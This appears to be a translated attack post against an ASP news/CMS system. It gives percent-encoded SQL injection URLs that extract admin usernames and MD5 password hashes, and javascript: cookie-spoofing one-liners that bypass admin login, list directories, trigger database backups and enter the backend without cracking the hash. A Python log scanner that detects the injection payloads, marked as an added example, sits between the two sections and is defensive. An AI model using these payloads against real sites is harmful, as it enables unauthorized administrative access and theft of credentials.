I. Injection
1. news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

2. Step 1: javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
Step 2: request: admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
This yields the username and the MD5-hashed password.

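Added example (not from the original post): a small Python log scanner for the injection requests above. The payloads spell SQL keywords with percent-encoded letters (%41nd, %53elect, %46rom), so a filter that matches "select" on the raw URL misses them; decoding before matching catches them. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample: one benign request followed by two requests
# carrying the percent-encoded union/select payloads from the post.
SAMPLE_LOG = """\
1.2.3.4 - - [01/Jan/2024:10:00:00 +0000] "GET /news_more.asp?lm=2 HTTP/1.1" 200 512
1.2.3.4 - - [01/Jan/2024:10:00:05 +0000] "GET /news_more.asp?lm=2%20%41nd%201=2%20union%20%53elect%201,2,3,0x3b%26user,0x3b%26pass,6,7,8%20%46rom%20%41dmin HTTP/1.1" 500 0
1.2.3.4 - - [01/Jan/2024:10:00:09 +0000] "GET /admin_lm_edit.asp?id=1%20%41nd%201=2%20union%20%53elect%201,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Matches after normalisation: "union ... select" or a tautology/contradiction
# such as "and 1=2" used to empty the original result set.
SQLI_RE = re.compile(r'\bunion\b.*\bselect\b|\b(?:and|or)\b\s+\d+\s*=\s*\d+')


def normalize(url: str) -> str:
    """Percent-decode (bounded, to handle double encoding), fold case and whitespace."""
    cur, prev = url, None
    for _ in range(3):            # cap iterations so %25-chains cannot loop forever
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    cur = cur.replace('+', ' ')
    return re.sub(r'\s+', ' ', cur).lower()


def scan_log(text: str) -> list:
    """Return (raw_url, decoded_url) for requests whose decoded query matches SQLI_RE."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        raw = m.group(1)
        decoded = normalize(raw)
        if '?' in decoded and SQLI_RE.search(decoded.split('?', 1)[1]):
            hits.append((raw, decoded))
    return hits


if __name__ == "__main__":
    for raw, decoded in scan_log(SAMPLE_LOG):
        print("suspect:", decoded)
```

Note that %26 decodes to &, which the payloads use as the string-concatenation operator so the literal & does not split the query string; the decoded form makes that visible to the matcher as well.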
II. Cookie spoofing

1. Direct entry to the admin backend. Applies to older versions; in general, versions where login.asp and admin_index.asp sit in the same directory have this vulnerability.
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
2. Directory listing.
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."

3. Database backup (applicability seems to be rather low).
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"

4. Entering the backend when the obtained MD5 password cannot be cracked
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"